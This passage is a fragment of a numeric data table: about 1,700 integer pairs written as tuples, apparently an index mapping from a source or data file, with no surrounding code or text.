(15172, 1892),
(15173, 1893),
(15174, 1894),
(15175, 1895),
(15176, 1896),
(15177, 1897),
(15178, 1898),
(15179, 1899),
(15180, 1900),
(15181, 1901),
(15182, 1902),
(15183, 1903),
(15184, 1904),
(15185, 1905),
(15186, 1906),
(15187, 1907),
(15188, 1908),
(15189, 1909),
(15190, 1910),
(15191, 1911),
(15192, 1912),
(15193, 1913),
(15194, 1914),
(15195, 1915),
(15196, 1916),
(15197, 1917),
(15198, 1918),
(15199, 1919),
(15200, 1920),
(15201, 1921),
(15202, 1922),
(15203, 1923),
(15204, 1924),
(15205, 1925),
(15206, 1926),
(15207, 1927),
(15208, 1928),
(15209, 1929),
(15210, 1930),
(15211, 1931),
(15212, 1932),
(15213, 1933),
(15214, 1934),
(15215, 1935),
(15216, 1936),
(15217, 1937),
(15218, 1938),
(15219, 1939),
(15220, 1940),
(15221, 1941),
(15222, 1942),
(15223, 1943),
(15224, 1944),
(15225, 1945),
(15226, 1946),
(15227, 1947),
(15228, 1948),
(15229, 1949),
(15230, 1950),
(15231, 1951),
(15232, 1952),
(15233, 1953),
(15234, 1954),
(15235, 1955),
(15236, 1956),
(15237, 1957),
(15238, 1958),
(15239, 1959),
(15240, 1860),
(15241, 1861),
(15242, 1862),
(15243, 1863),
(15244, 1864),
(15245, 1865),
(15246, 1866),
(15247, 1867),
(15248, 1868),
(15249, 1869),
(15250, 1870),
(15251, 1871),
(15252, 1872),
(15253, 1873),
(15254, 1874),
(15255, 1875),
(15256, 1876),
(15257, 1877),
(15258, 1878),
(15259, 1879),
(15260, 1880),
(15261, 1881),
(15262, 1882),
(15263, 1883),
(15264, 1884),
(15265, 1885),
(15266, 1886),
(15267, 1887),
(15268, 1888),
(15269, 1889),
(15270, 1890),
(15271, 1891),
(15272, 1892),
(15273, 1893),
(15274, 1894),
(15275, 1895),
(15276, 1896),
(15277, 1897),
(15278, 1898),
(15279, 1899),
(15280, 1900),
(15281, 1901),
(15282, 1902),
(15283, 1903),
(15284, 1904),
(15285, 1905),
(15286, 1906),
(15287, 1907),
(15288, 1908),
(15289, 1909),
(15290, 1910),
(15291, 1911),
(15292, 1912),
(15293, 1913),
(15294, 1914),
(15295, 1915),
(15296, 1916),
(15297, 1917),
(15298, 1918),
(15299, 1919),
(15300, 1920),
(15301, 1921),
(15302, 1922),
(15303, 1923),
(15304, 1924),
(15305, 1925),
(15306, 1926),
(15307, 1927),
(15308, 1928),
(15309, 1929),
(15310, 1930),
(15311, 1931),
(15312, 1932),
(15313, 1933),
(15314, 1934),
(15315, 1935),
(15316, 1936),
(15317, 1937),
(15318, 1938),
(15319, 1939),
(15320, 1940),
(15321, 1941),
(15322, 1942),
(15323, 1943),
(15324, 1944),
(15325, 1945),
(15326, 1946),
(15327, 1947),
(15328, 1948),
(15329, 1949),
(15330, 1950),
(15331, 1951),
(15332, 1952),
(15333, 1953),
(15334, 1954),
(15335, 1955),
(15336, 1956),
(15337, 1957),
(15338, 1958),
(15339, 1959),
(15340, 1860),
(15341, 1860),
(15342, 1860),
(15343, 1860),
(15344, 1860),
(15345, 1860),
(15346, 1860),
(15347, 1860),
(15348, 1860),
(15349, 1861),
(15350, 1861),
(15351, 1861),
(15352, 1861),
(15353, 1861),
(15354, 1861),
(15355, 1862),
(15356, 1862),
(15357, 1862),
(15358, 1862),
(15359, 1862),
(15360, 1862),
(15361, 1863),
(15362, 1863),
(15363, 1863),
(15364, 1863),
(15365, 1863),
(15366, 1863),
(15367, 1864),
(15368, 1864),
(15369, 1864),
(15370, 1864),
(15371, 1864),
(15372, 1864),
(15373, 1865),
(15374, 1865),
(15375, 1865),
(15376, 1865),
(15377, 1865),
(15378, 1865),
(15379, 1866),
(15380, 1866),
(15381, 1866),
(15382, 1866),
(15383, 1866),
(15384, 1866),
(15385, 1867),
(15386, 1867),
(15387, 1867),
(15388, 1867),
(15389, 1867),
(15390, 1867),
(15391, 1867),
(15392, 1867),
(15393, 1867),
(15394, 1868),
(15395, 1868),
(15396, 1868),
(15397, 1868),
(15398, 1868),
(15399, 1868),
(15400, 1869),
(15401, 1869),
(15402, 1869),
(15403, 1869),
(15404, 1869),
(15405, 1869),
(15406, 1870),
(15407, 1870),
(15408, 1870),
(15409, 1870),
(15410, 1870),
(15411, 1870),
(15412, 1871),
(15413, 1871),
(15414, 1871),
(15415, 1871),
(15416, 1871),
(15417, 1871),
(15418, 1872),
(15419, 1872),
(15420, 1872),
(15421, 1872),
(15422, 1872),
(15423, 1872),
(15424, 1873),
(15425, 1873),
(15426, 1873),
(15427, 1873),
(15428, 1873),
(15429, 1873),
(15430, 1874),
(15431, 1874),
(15432, 1874),
(15433, 1874),
(15434, 1874),
(15435, 1874),
(15436, 1874),
(15437, 1874),
(15438, 1874),
(15439, 1875),
(15440, 1875),
(15441, 1875),
(15442, 1875),
(15443, 1875),
(15444, 1875),
(15445, 1876),
(15446, 1876),
(15447, 1876),
(15448, 1876),
(15449, 1876),
(15450, 1876),
(15451, 1877),
(15452, 1877),
(15453, 1877),
(15454, 1877),
(15455, 1877),
(15456, 1877),
(15457, 1878),
(15458, 1878),
(15459, 1878),
(15460, 1878),
(15461, 1878),
(15462, 1878),
(15463, 1879),
(15464, 1879),
(15465, 1879),
(15466, 1879),
(15467, 1879),
(15468, 1879),
(15469, 1880),
(15470, 1880),
(15471, 1880),
(15472, 1880),
(15473, 1880),
(15474, 1880),
(15475, 1881),
(15476, 1881),
(15477, 1881),
(15478, 1881),
(15479, 1881),
(15480, 1881),
(15481, 1881),
(15482, 1881),
(15483, 1881),
(15484, 1882),
(15485, 1882),
(15486, 1882),
(15487, 1882),
(15488, 1882),
(15489, 1882),
(15490, 1883),
(15491, 1883),
(15492, 1883),
(15493, 1883),
(15494, 1883),
(15495, 1883),
(15496, 1884),
(15497, 1884),
(15498, 1884),
(15499, 1884),
(15500, 1884),
(15501, 1884),
(15502, 1885),
(15503, 1885),
(15504, 1885),
(15505, 1885),
(15506, 1885),
(15507, 1885),
(15508, 1886),
(15509, 1886),
(15510, 1886),
(15511, 1886),
(15512, 1886),
(15513, 1886),
(15514, 1887),
(15515, 1887),
(15516, 1887),
(15517, 1887),
(15518, 1887),
(15519, 1887),
(15520, 1888),
(15521, 1888),
(15522, 1888),
(15523, 1888),
(15524, 1888),
(15525, 1888),
(15526, 1888),
(15527, 1888),
(15528, 1888),
(15529, 1889),
(15530, 1889),
(15531, 1889),
(15532, 1889),
(15533, 1889),
(15534, 1889),
(15535, 1890),
(15536, 1890),
(15537, 1890),
(15538, 1890),
(15539, 1890),
(15540, 1890),
(15541, 1891),
(15542, 1891),
(15543, 1891),
(15544, 1891),
(15545, 1891),
(15546, 1891),
(15547, 1892),
(15548, 1892),
(15549, 1892),
(15550, 1892),
(15551, 1892),
(15552, 1892),
(15553, 1893),
(15554, 1893),
(15555, 1893),
(15556, 1893),
(15557, 1893),
(15558, 1893),
(15559, 1894),
(15560, 1894),
(15561, 1894),
(15562, 1894),
(15563, 1894),
(15564, 1894),
(15565, 1895),
(15566, 1895),
(15567, 1895),
(15568, 1895),
(15569, 1895),
(15570, 1895),
(15571, 1895),
(15572, 1895),
(15573, 1895),
(15574, 1896),
(15575, 1896),
(15576, 1896),
(15577, 1896),
(15578, 1896),
(15579, 1896),
(15580, 1897),
(15581, 1897),
(15582, 1897),
(15583, 1897),
(15584, 1897),
(15585, 1897),
(15586, 1898),
(15587, 1898),
(15588, 1898),
(15589, 1898),
(15590, 1898),
(15591, 1898),
(15592, 1899),
(15593, 1899),
(15594, 1899),
(15595, 1899),
(15596, 1899),
(15597, 1899),
(15598, 1900),
(15599, 1900),
(15600, 1900),
(15601, 1900),
(15602, 1900),
(15603, 1900),
(15604, 1901),
(15605, 1901),
(15606, 1901),
(15607, 1901),
(15608, 1901),
(15609, 1901),
(15610, 1902),
(15611, 1902),
(15612, 1902),
(15613, 1902),
(15614, 1902),
(15615, 1902),
(15616, 1902),
(15617, 1902),
(15618, 1902),
(15619, 1903),
(15620, 1903),
(15621, 1903),
(15622, 1903),
(15623, 1903),
(15624, 1903),
(15625, 1904),
(15626, 1904),
(15627, 1904),
(15628, 1904),
(15629, 1904),
(15630, 1904),
(15631, 1905),
(15632, 1905),
(15633, 1905),
(15634, 1905),
(15635, 1905),
(15636, 1905),
(15637, 1906),
(15638, 1906),
(15639, 1906),
(15640, 1906),
(15641, 1906),
(15642, 1906),
(15643, 1907),
(15644, 1907),
(15645, 1907),
(15646, 1907),
(15647, 1907),
(15648, 1907),
(15649, 1908),
(15650, 1908),
(15651, 1908),
(15652, 1908),
(15653, 1908),
(15654, 1908),
(15655, 1909),
(15656, 1909),
(15657, 1909),
(15658, 1909),
(15659, 1909),
(15660, 1909),
(15661, 1909),
(15662, 1909),
(15663, 1909),
(15664, 1910),
(15665, 1910),
(15666, 1910),
(15667, 1910),
(15668, 1910),
(15669, 1910),
(15670, 1911),
(15671, 1911),
(15672, 1911),
(15673, 1911),
(15674, 1911),
(15675, 1911),
(15676, 1912),
(15677, 1912),
(15678, 1912),
(15679, 1912),
(15680, 1912),
(15681, 1912),
(15682, 1913),
(15683, 1913),
(15684, 1913),
(15685, 1913),
(15686, 1913),
(15687, 1913),
(15688, 1914),
(15689, 1914),
(15690, 1914),
(15691, 1914),
(15692, 1914),
(15693, 1914),
(15694, 1915),
(15695, 1915),
(15696, 1915),
(15697, 1915),
(15698, 1915),
(15699, 1915),
(15700, 1916),
(15701, 1916),
(15702, 1916),
(15703, 1916),
(15704, 1916),
(15705, 1916),
(15706, 1916),
(15707, 1916),
(15708, 1916),
(15709, 1917),
(15710, 1917),
(15711, 1917),
(15712, 1917),
(15713, 1917),
(15714, 1917),
(15715, 1918),
(15716, 1918),
(15717, 1918),
(15718, 1918),
(15719, 1918),
(15720, 1918),
(15721, 1919),
(15722, 1919),
(15723, 1919),
(15724, 1919),
(15725, 1919),
(15726, 1919),
(15727, 1920),
(15728, 1920),
(15729, 1920),
(15730, 1920),
(15731, 1920),
(15732, 1920),
(15733, 1921),
(15734, 1921),
(15735, 1921),
(15736, 1921),
(15737, 1921),
(15738, 1921),
(15739, 1922),
(15740, 1922),
(15741, 1922),
(15742, 1922),
(15743, 1922),
(15744, 1922),
(15745, 1923),
(15746, 1923),
(15747, 1923),
(15748, 1923),
(15749, 1923),
(15750, 1923),
(15751, 1924),
(15752, 1924),
(15753, 1924),
(15754, 1924),
(15755, 1924),
(15756, 1924),
(15757, 1925),
(15758, 1925),
(15759, 1925),
(15760, 1925),
(15761, 1925),
(15762, 1925),
(15763, 1926),
(15764, 1926),
(15765, 1926),
(15766, 1926),
(15767, 1926),
(15768, 1926),
(15769, 1927),
(15770, 1927),
(15771, 1927),
(15772, 1927),
(15773, 1927),
(15774, 1927),
(15775, 1928),
(15776, 1928),
(15777, 1928),
(15778, 1928),
(15779, 1928),
(15780, 1928),
(15781, 1929),
(15782, 1929),
(15783, 1929),
(15784, 1929),
(15785, 1929),
(15786, 1929),
(15787, 1930),
(15788, 1930),
(15789, 1930),
(15790, 1930),
(15791, 1930),
(15792, 1930),
(15793, 1931),
(15794, 1931),
(15795, 1931),
(15796, 1931),
(15797, 1931),
(15798, 1931),
(15799, 1932),
(15800, 1932),
(15801, 1932),
(15802, 1932),
(15803, 1932),
(15804, 1932),
(15805, 1932),
(15806, 1932),
(15807, 1932),
(15808, 1933),
(15809, 1933),
(15810, 1933),
(15811, 1933),
(15812, 1933),
(15813, 1933),
(15814, 1934),
(15815, 1934),
(15816, 1934),
(15817, 1934),
(15818, 1934),
(15819, 1934),
(15820, 1935),
(15821, 1935),
(15822, 1935),
(15823, 1935),
(15824, 1935),
(15825, 1935),
(15826, 1936),
(15827, 1936),
(15828, 1936),
(15829, 1936),
(15830, 1936),
(15831, 1936),
(15832, 1937),
(15833, 1937),
(15834, 1937),
(15835, 1937),
(15836, 1937),
(15837, 1937),
(15838, 1938),
(15839, 1938),
(15840, 1938),
(15841, 1938),
(15842, 1938),
(15843, 1938),
(15844, 1939),
(15845, 1939),
(15846, 1939),
(15847, 1939),
(15848, 1939),
(15849, 1939),
(15850, 1940),
(15851, 1940),
(15852, 1940),
(15853, 1940),
(15854, 1940),
(15855, 1940),
(15856, 1941),
(15857, 1941),
(15858, 1941),
(15859, 1941),
(15860, 1941),
(15861, 1941),
(15862, 1942),
(15863, 1942),
(15864, 1942),
(15865, 1942),
(15866, 1942),
(15867, 1942),
(15868, 1943),
(15869, 1943),
(15870, 1943),
(15871, 1943),
(15872, 1943),
(15873, 1943),
(15874, 1944),
(15875, 1944),
(15876, 1944),
(15877, 1944),
(15878, 1944),
(15879, 1944),
(15880, 1945),
(15881, 1945),
(15882, 1945),
(15883, 1945),
(15884, 1945),
(15885, 1945),
(15886, 1946),
(15887, 1946),
(15888, 1946),
(15889, 1946),
(15890, 1946),
(15891, 1946),
(15892, 1947),
(15893, 1947),
(15894, 1947),
(15895, 1947),
(15896, 1947),
(15897, 1947),
(15898, 1948),
(15899, 1948),
(15900, 1948),
(15901, 1948),
(15902, 1948),
(15903, 1948),
(15904, 1948),
(15905, 1948),
(15906, 1948),
(15907, 1949),
(15908, 1949),
(15909, 1949),
(15910, 1949),
(15911, 1949),
(15912, 1949),
(15913, 1950),
(15914, 1950),
(15915, 1950),
(15916, 1950),
(15917, 1950),
(15918, 1950),
(15919, 1951),
(15920, 1951),
(15921, 1951),
(15922, 1951),
(15923, 1951),
(15924, 1951),
(15925, 1952),
(15926, 1952),
(15927, 1952),
(15928, 1952),
(15929, 1952),
(15930, 1952),
(15931, 1953),
(15932, 1953),
(15933, 1953),
(15934, 1953),
(15935, 1953),
(15936, 1953),
(15937, 1954),
(15938, 1954),
(15939, 1954),
(15940, 1954),
(15941, 1954),
(15942, 1954),
(15943, 1955),
(15944, 1955),
(15945, 1955),
(15946, 1955),
(15947, 1955),
(15948, 1955),
(15949, 1956),
(15950, 1956),
(15951, 1956),
(15952, 1956),
(15953, 1956),
(15954, 1956),
(15955, 1957),
(15956, 1957),
(15957, 1957),
(15958, 1957),
(15959, 1957),
(15960, 1957),
(15961, 1958),
(15962, 1958),
(15963, 1958),
(15964, 1958),
(15965, 1958),
(15966, 1958),
(15967, 1959),
(15968, 1959),
(15969, 1959),
(15970, 1959),
(15971, 1959),
(15972, 1959),
(15973, 1960),
(15974, 1961),
(15975, 1962),
(15976, 1963),
(15977, 1964),
(15978, 1965),
(15979, 1966),
(15980, 1967),
(15981, 1968),
(15982, 1969),
(15983, 1970),
(15984, 1971),
(15985, 1972),
(15986, 1973),
(15987, 1974),
(15988, 1975),
(15989, 1976),
(15990, 1977),
(15991, 1978),
(15992, 1979),
(15993, 1980),
(15994, 1981),
(15995, 1982),
(15996, 1983),
(15997, 1984),
(15998, 1985),
(15999, 1986),
(16000, 1987),
(16001, 1988),
(16002, 1989),
(16003, 1990),
(16004, 1991),
(16005, 1992),
(16006, 1993),
(16007, 1994),
(16008, 1995),
(16009, 1996),
(16010, 1997),
(16011, 1998),
(16012, 1999),
(16013, 2000),
(16014, 2001),
(16015, 2002),
(16016, 2003),
(16017, 2004),
(16018, 2005),
(16019, 2006),
(16020, 2007),
(16021, 2008),
(16022, 2009),
(16023, 2010),
(16024, 2011),
(16025, 2012),
(16026, 2013),
(16027, 2014),
(16028, 2015),
(16029, 2016),
(16030, 2017),
(16031, 2018),
(16032, 2019),
(16033, 2020),
(16034, 2021),
(16035, 2022),
(16036, 2023),
(16037, 2024),
(16038, 2025),
(16039, 2026),
(16040, 2027),
(16041, 2028),
(16042, 2029),
(16043, 2030),
(16044, 2031),
(16045, 2032),
(16046, 2033),
(16047, 2034),
(16048, 2035),
(16049, 2036),
(16050, 2037),
(16051, 2038),
(16052, 2039),
(16053, 2040),
(16054, 2041),
(16055, 2042),
(16056, 2043),
(16057, 2044),
(16058, 2045),
(16059, 2046),
(16060, 2047),
(16061, 2048),
(16062, 2049),
(16063, 2050),
(16064, 2051),
(16065, 2052),
(16066, 2053),
(16067, 1960),
(16068, 1961),
(16069, 1962),
(16070, 1963),
(16071, 1964),
(16072, 1965),
(16073, 1966),
(16074, 1967),
(16075, 1968),
(16076, 1969),
(16077, 1970),
(16078, 1971),
(16079, 1972),
(16080, 1973),
(16081, 1974),
(16082, 1975),
(16083, 1976),
(16084, 1977),
(16085, 1978),
(16086, 1979),
(16087, 1980),
(16088, 1981),
(16089, 1982),
(16090, 1983),
(16091, 1984),
(16092, 1985),
(16093, 1986),
(16094, 1987),
(16095, 1988),
(16096, 1989),
(16097, 1990),
(16098, 1991),
(16099, 1992),
(16100, 1993),
(16101, 1994),
(16102, 1995),
(16103, 1996),
(16104, 1997),
(16105, 1998),
(16106, 1999),
(16107, 2000),
(16108, 2001),
(16109, 2002),
(16110, 2003),
(16111, 2004),
(16112, 2005),
(16113, 2006),
(16114, 2007),
(16115, 2008),
(16116, 2009),
(16117, 2010),
(16118, 2011),
(16119, 2012),
(16120, 2013),
(16121, 2014),
(16122, 2015),
(16123, 2016),
(16124, 2017),
(16125, 2018),
(16126, 2019),
(16127, 2020),
(16128, 2021),
(16129, 2022),
(16130, 2023),
(16131, 2024),
(16132, 2025),
(16133, 2026),
(16134, 2027),
(16135, 2028),
(16136, 2029),
(16137, 2030),
(16138, 2031),
(16139, 2032),
(16140, 2033),
(16141, 2034),
(16142, 2035),
(16143, 2036),
(16144, 2037),
(16145, 2038),
(16146, 2039),
(16147, 2040),
(16148, 2041),
(16149, 2042),
(16150, 2043),
(16151, 2044),
(16152, 2045),
(16153, 2046),
(16154, 2047),
(16155, 2048),
(16156, 2049),
(16157, 2050),
(16158, 2051),
(16159, 2052),
(16160, 2053),
(16161, 1960),
(16162, 1960),
(16163, 1960),
(16164, 1960),
(16165, 1960),
(16166, 1960),
(16167, 1961),
(16168, 1961),
(16169, 1961),
(16170, 1961),
(16171, 1961),
(16172, 1961),
(16173, 1962),
(16174, 1962),
(16175, 1962),
(16176, 1962),
(16177, 1962),
(16178, 1962),
(16179, 1963),
(16180, 1963),
(16181, 1963),
(16182, 1963),
(16183, 1963),
(16184, 1963),
(16185, 1964),
(16186, 1964),
(16187, 1964),
(16188, 1964),
(16189, 1964),
(16190, 1964),
(16191, 1964),
(16192, 1964),
(16193, 1964),
(16194, 1965),
(16195, 1965),
(16196, 1965),
(16197, 1965),
(16198, 1965),
(16199, 1965),
(16200, 1966),
(16201, 1966),
(16202, 1966),
(16203, 1966),
(16204, 1966),
(16205, 1966),
(16206, 1967),
(16207, 1967),
(16208, 1967),
(16209, 1967),
(16210, 1967),
(16211, 1967),
(16212, 1968),
(16213, 1968),
(16214, 1968),
(16215, 1968),
(16216, 1968),
(16217, 1968),
(16218, 1969),
(16219, 1969),
(16220, 1969),
(16221, 1969),
(16222, 1969),
(16223, 1969),
(16224, 1970),
(16225, 1970),
(16226, 1970),
(16227, 1970),
(16228, 1970),
(16229, 1970),
(16230, 1971),
(16231, 1971),
(16232, 1971),
(16233, 1971),
(16234, 1971),
(16235, 1971),
(16236, 1972),
(16237, 1972),
(16238, 1972),
(16239, 1972),
(16240, 1972),
(16241, 1972),
(16242, 1973),
(16243, 1973),
(16244, 1973),
(16245, 1973),
(16246, 1973),
(16247, 1973),
(16248, 1974),
(16249, 1974),
(16250, 1974),
(16251, 1974),
(16252, 1974),
(16253, 1974),
(16254, 1975),
(16255, 1975),
(16256, 1975),
(16257, 1975),
(16258, 1975),
(16259, 1975),
(16260, 1976),
(16261, 1976),
(16262, 1976),
(16263, 1976),
(16264, 1976),
(16265, 1976),
(16266, 1977),
(16267, 1977),
(16268, 1977),
(16269, 1977),
(16270, 1977),
(16271, 1977),
(16272, 1978),
(16273, 1978),
(16274, 1978),
(16275, 1978),
(16276, 1978),
(16277, 1978),
(16278, 1979),
(16279, 1979),
(16280, 1979),
(16281, 1979),
(16282, 1979),
(16283, 1979),
(16284, 1980),
(16285, 1980),
(16286, 1980),
(16287, 1980),
(16288, 1980),
(16289, 1980),
(16290, 1980),
(16291, 1980),
(16292, 1980),
(16293, 1981),
(16294, 1981),
(16295, 1981),
(16296, 1981),
(16297, 1981),
(16298, 1981),
(16299, 1982),
(16300, 1982),
(16301, 1982),
(16302, 1982),
(16303, 1982),
(16304, 1982),
(16305, 1983),
(16306, 1983),
(16307, 1983),
(16308, 1983),
(16309, 1983),
(16310, 1983),
(16311, 1984),
(16312, 1984),
(16313, 1984),
(16314, 1984),
(16315, 1984),
(16316, 1984),
(16317, 1985),
(16318, 1985),
(16319, 1985),
(16320, 1985),
(16321, 1985),
(16322, 1985),
(16323, 1986),
(16324, 1986),
(16325, 1986),
(16326, 1986),
(16327, 1986),
(16328, 1986),
(16329, 1987),
(16330, 1987),
(16331, 1987),
(16332, 1987),
(16333, 1987),
(16334, 1987),
(16335, 1988),
(16336, 1988),
(16337, 1988),
(16338, 1988),
(16339, 1988),
(16340, 1988),
(16341, 1989),
(16342, 1989),
(16343, 1989),
(16344, 1989),
(16345, 1989),
(16346, 1989),
(16347, 1990),
(16348, 1990),
(16349, 1990),
(16350, 1990),
(16351, 1990),
(16352, 1990),
(16353, 1991),
(16354, 1991),
(16355, 1991),
(16356, 1991),
(16357, 1991),
(16358, 1991),
(16359, 1992),
(16360, 1992),
(16361, 1992),
(16362, 1992),
(16363, 1992),
(16364, 1992),
(16365, 1993),
(16366, 1993),
(16367, 1993),
(16368, 1993),
(16369, 1993),
(16370, 1993),
(16371, 1994),
(16372, 1994),
(16373, 1994),
(16374, 1994),
(16375, 1994),
(16376, 1994),
(16377, 1995),
(16378, 1995),
(16379, 1995),
(16380, 1995),
(16381, 1995),
(16382, 1995),
(16383, 1996),
(16384, 1996),
(16385, 1996),
(16386, 1996),
(16387, 1996),
(16388, 1996),
(16389, 1996),
(16390, 1996),
(16391, 1996),
(16392, 1997),
(16393, 1997),
(16394, 1997),
(16395, 1997),
(16396, 1997),
(16397, 1997),
(16398, 1998),
(16399, 1998),
(16400, 1998),
(16401, 1998),
(16402, 1998),
(16403, 1998),
(16404, 1999),
(16405, 1999),
(16406, 1999),
(16407, 1999),
(16408, 1999),
(16409, 1999),
(16410, 2000),
(16411, 2000),
(16412, 2000),
(16413, 2000),
(16414, 2000),
(16415, 2000),
(16416, 2001),
(16417, 2001),
(16418, 2001),
(16419, 2001),
(16420, 2001),
(16421, 2001),
(16422, 2002),
(16423, 2002),
(16424, 2002),
(16425, 2002),
(16426, 2002),
(16427, 2002),
(16428, 2003),
(16429, 2003),
(16430, 2003),
(16431, 2003),
(16432, 2003),
(16433, 2003),
(16434, 2003),
(16435, 2003),
(16436, 2003),
(16437, 2004),
(16438, 2004),
(16439, 2004),
(16440, 2004),
(16441, 2004),
(16442, 2004),
(16443, 2005),
(16444, 2005),
(16445, 2005),
(16446, 2005),
(16447, 2005),
(16448, 2005),
(16449, 2006),
(16450, 2006),
(16451, 2006),
(16452, 2006),
(16453, 2006),
(16454, 2006),
(16455, 2007),
(16456, 2007),
(16457, 2007),
(16458, 2007),
(16459, 2007),
(16460, 2007),
(16461, 2008),
(16462, 2008),
(16463, 2008),
(16464, 2008),
(16465, 2008),
(16466, 2008),
(16467, 2009),
(16468, 2009),
(16469, 2009),
(16470, 2009),
(16471, 2009),
(16472, 2009),
(16473, 2010),
(16474, 2010),
(16475, 2010),
(16476, 2010),
(16477, 2010),
(16478, 2010),
(16479, 2010),
(16480, 2010),
(16481, 2010),
(16482, 2011),
(16483, 2011),
(16484, 2011),
(16485, 2011),
(16486, 2011),
(16487, 2011),
(16488, 2012),
(16489, 2012),
(16490, 2012),
(16491, 2012),
(16492, 2012),
(16493, 2012),
(16494, 2013),
(16495, 2013),
(16496, 2013),
(16497, 2013),
(16498, 2013),
(16499, 2013),
(16500, 2014),
(16501, 2014),
(16502, 2014),
(16503, 2014),
(16504, 2014),
(16505, 2014),
(16506, 2015),
(16507, 2015),
(16508, 2015),
(16509, 2015),
(16510, 2015),
(16511, 2015),
(16512, 2016),
(16513, 2016),
(16514, 2016),
(16515, 2016),
(16516, 2016),
(16517, 2016),
(16518, 2016),
(16519, 2016),
(16520, 2016),
(16521, 2017),
(16522, 2017),
(16523, 2017),
(16524, 2017),
(16525, 2017),
(16526, 2017),
(16527, 2018),
(16528, 2018),
(16529, 2018),
(16530, 2018),
(16531, 2018),
(16532, 2018),
(16533, 2019),
(16534, 2019),
(16535, 2019),
(16536, 2019),
(16537, 2019),
(16538, 2019),
(16539, 2020),
(16540, 2020),
(16541, 2020),
(16542, 2020),
(16543, 2020),
(16544, 2020),
(16545, 2021),
(16546, 2021),
(16547, 2021),
(16548, 2021),
(16549, 2021),
(16550, 2021),
(16551, 2022),
(16552, 2022),
(16553, 2022),
(16554, 2022),
(16555, 2022),
(16556, 2022),
(16557, 2023),
(16558, 2023),
(16559, 2023),
(16560, 2023),
(16561, 2023),
(16562, 2023),
(16563, 2023),
(16564, 2023),
(16565, 2023),
(16566, 2024),
(16567, 2024),
(16568, 2024),
(16569, 2024),
(16570, 2024),
(16571, 2024),
(16572, 2025),
(16573, 2025),
(16574, 2025),
(16575, 2025),
(16576, 2025),
(16577, 2025),
(16578, 2026),
(16579, 2026),
(16580, 2026),
(16581, 2026),
(16582, 2026),
(16583, 2026),
(16584, 2027),
(16585, 2027),
(16586, 2027),
(16587, 2027),
(16588, 2027),
(16589, 2027),
(16590, 2028),
(16591, 2028),
(16592, 2028),
(16593, 2028),
(16594, 2028),
(16595, 2028),
(16596, 2029),
(16597, 2029),
(16598, 2029),
(16599, 2029),
(16600, 2029),
(16601, 2029),
(16602, 2030),
(16603, 2030),
(16604, 2030),
(16605, 2030),
(16606, 2030),
(16607, 2030),
(16608, 2030),
(16609, 2030),
(16610, 2030),
(16611, 2031),
(16612, 2031),
(16613, 2031),
(16614, 2031),
(16615, 2031),
(16616, 2031),
(16617, 2032),
(16618, 2032),
(16619, 2032),
(16620, 2032),
(16621, 2032),
(16622, 2032),
(16623, 2033),
(16624, 2033),
(16625, 2033),
(16626, 2033),
(16627, 2033),
(16628, 2033),
(16629, 2034),
(16630, 2034),
(16631, 2034),
(16632, 2034),
(16633, 2034),
(16634, 2034),
(16635, 2035),
(16636, 2035),
(16637, 2035),
(16638, 2035),
(16639, 2035),
(16640, 2035),
(16641, 2036),
(16642, 2036),
(16643, 2036),
(16644, 2036),
(16645, 2036),
(16646, 2036),
(16647, 2037),
(16648, 2037),
(16649, 2037),
(16650, 2037),
(16651, 2037),
(16652, 2037),
(16653, 2037),
(16654, 2037),
(16655, 2037),
(16656, 2038),
(16657, 2038),
(16658, 2038),
(16659, 2038),
(16660, 2038),
(16661, 2038),
(16662, 2039),
(16663, 2039),
(16664, 2039),
(16665, 2039),
(16666, 2039),
(16667, 2039),
(16668, 2040),
(16669, 2040),
(16670, 2040),
(16671, 2040),
(16672, 2040),
(16673, 2040),
(16674, 2041),
(16675, 2041),
(16676, 2041),
(16677, 2041),
(16678, 2041),
(16679, 2041),
(16680, 2042),
(16681, 2042),
(16682, 2042),
(16683, 2042),
(16684, 2042),
(16685, 2042),
(16686, 2043),
(16687, 2043),
(16688, 2043),
(16689, 2043),
(16690, 2043),
(16691, 2043),
(16692, 2044),
(16693, 2044),
(16694, 2044),
(16695, 2044),
(16696, 2044),
(16697, 2044),
(16698, 2045),
(16699, 2045),
(16700, 2045),
(16701, 2045),
(16702, 2045),
(16703, 2045),
(16704, 2046),
(16705, 2046),
(16706, 2046),
(16707, 2046),
(16708, 2046),
(16709, 2046),
(16710, 2047),
(16711, 2047),
(16712, 2047),
(16713, 2047),
(16714, 2047),
(16715, 2047),
(16716, 2048),
(16717, 2048),
(16718, 2048),
(16719, 2048),
(16720, 2048),
(16721, 2048),
(16722, 2049),
(16723, 2049),
(16724, 2049),
(16725, 2049),
(16726, 2049),
(16727, 2049),
(16728, 2050),
(16729, 2050),
(16730, 2050),
(16731, 2050),
(16732, 2050),
(16733, 2050),
(16734, 2051),
(16735, 2051),
(16736, 2051),
(16737, 2051),
(16738, 2051),
(16739, 2051),
(16740, 2052),
(16741, 2052),
(16742, 2052),
(16743, 2052),
(16744, 2052),
(16745, 2052),
(16746, 2053),
(16747, 2053),
(16748, 2053),
(16749, 2053),
(16750, 2053),
(16751, 2053),
(16752, 2053),
(16753, 2053),
(16754, 2053),
(16755, 1233),
(16756, 1233),
(16757, 1233),
(16758, 1233),
(16759, 1249),
(16760, 1249),
(16761, 1249),
(16762, 1249),
(16763, 1265),
(16764, 1265),
(16765, 1265),
(16766, 1265),
(16767, 1281),
(16768, 1281),
(16769, 1281),
(16770, 1281),
(16771, 1297),
(16772, 1297),
(16773, 1297),
(16774, 1297),
(16775, 1393),
(16776, 1393),
(16777, 1393),
(16778, 1393),
(16779, 1313),
(16780, 1313),
(16781, 1313),
(16782, 1313),
(16783, 1329),
(16784, 1329),
(16785, 1329),
(16786, 1329),
(16787, 1345),
(16788, 1345),
(16789, 1345),
(16790, 1345),
(16791, 1361),
(16792, 1361),
(16793, 1361),
(16794, 1361),
(16795, 1377),
(16796, 1377),
(16797, 1377),
(16798, 1377),
(16799, 1409),
(16800, 1409),
(16801, 1409),
(16802, 1409),
(16803, 4),
(16804, 2054),
(16805, 2054),
(16806, 2054),
(16807, 2054),
(16808, 2054),
(16809, 2055),
(16810, 2055),
(16811, 2055),
(16812, 2055),
(16813, 2055),
(16814, 2055),
(16815, 17),
(16816, 18),
(16817, 19),
(16818, 20),
(16819, 21),
(16820, 22),
(16821, 23),
(16822, 6),
(16823, 7),
(16824, 8),
(16825, 9),
(16826, 10),
(16827, 11),
(16828, 12),
(16829, 14),
(16830, 15),
(16831, 24),
(16832, 25),
(16833, 26),
(16834, 27),
(16835, 28),
(16836, 29),
(16837, 30),
(16838, 31),
(16839, 40),
(16840, 41),
